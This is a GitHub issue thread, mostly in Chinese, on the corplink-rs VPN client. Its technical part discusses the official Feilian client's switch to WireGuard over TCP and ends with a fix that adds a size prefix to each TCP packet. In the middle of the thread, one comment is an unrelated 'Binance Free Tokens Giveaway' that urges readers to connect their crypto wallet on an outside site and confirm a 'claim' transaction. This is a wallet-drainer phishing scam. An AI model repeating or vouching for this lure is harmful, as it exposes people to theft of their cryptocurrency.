### ISSUE TITLE
v2.0.10 开始使用 tcp 连接

### ISSUE THREAD

**Issue by PinkD** [PinkD/corplink-rs#2]
#1 中 @ttys3 反馈道，飞连在 v2.0.10 版本开始使用 tcp 连接 wireguard ，通过查看 log 可以发现新增了 `tunc_linux.go` ，之前使用的是 [tun_linux.go](https://github.com/WireGuard/wireguard-go/blob/6a08d81f6bc465a2276c61093d96e567d00beb24/tun/tun_linux.go) 
从网络连接和抓包结果也可以确认，新版本只有 tcp 连接了

**Comment by PinkD** [comment]
https://github.com/PinkD/corplink-rs/commit/4526c663b42a713e45946abaa8541a73c4778cab#diff-7f93c4e263c4e9ec748f804c7fd04a3b2fde86ffd741fb5516d67e1097bae4c1R446-R454

https://github.com/PinkD/corplink-rs/blob/4526c663b42a713e45946abaa8541a73c4778cab/src/client.rs#L446-L454

1.4 版本加了个过滤非 udp vpn 的判断

**Comment by jixiuf** [comment]
最近有支持人计划吗

**Comment by PinkD** [comment]
> 最近有支持的计划吗

没有，这个是开发来我自己用的，然后 udp 暂时够用了，就没有搞 tcp 了 🤣 如果你有空闲时间，欢迎 pr

> 运行后 发现公司内网的网站可以访问了，但是像google等需要梯子的网站都打不开 （mac上可以），不知是不是跟这个issue相关

大概率不是，能访问内网就说明程序在正常运行，如果公司配了 google 的透明代理，那可能要把 google 的路由指向 corplink 的接口才行。例如我要让 `8.8.8.8` 走 `corplink` 接口，那就 `ip route add 8.8.8.8/32 dev corplink`

**Comment by shokry055** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by PinkD** [comment]
我司终于也干掉了 udp 服务器，只留了 tcp ，今天研究了一下，先加了个 `bind_tcp.go` ，然后发现连不上
看了下以前抓的包，应该是在每个包之前加了个 uint32 的 size ，我再改改
![image](https://github.com/user-attachments/assets/f5e15545-1a77-4755-bee1-8e1dd59083dc)

**Comment by PinkD** [comment]
附上原版 wg 的 udp 包
![image](https://github.com/user-attachments/assets/dcc93146-9a8e-4f81-9653-bcaf716f8980)

**Comment by PinkD** [comment]
fixed by https://github.com/PinkD/corplink-rs/commit/445c4c59638c4b69b5992559d140006e54d4929c
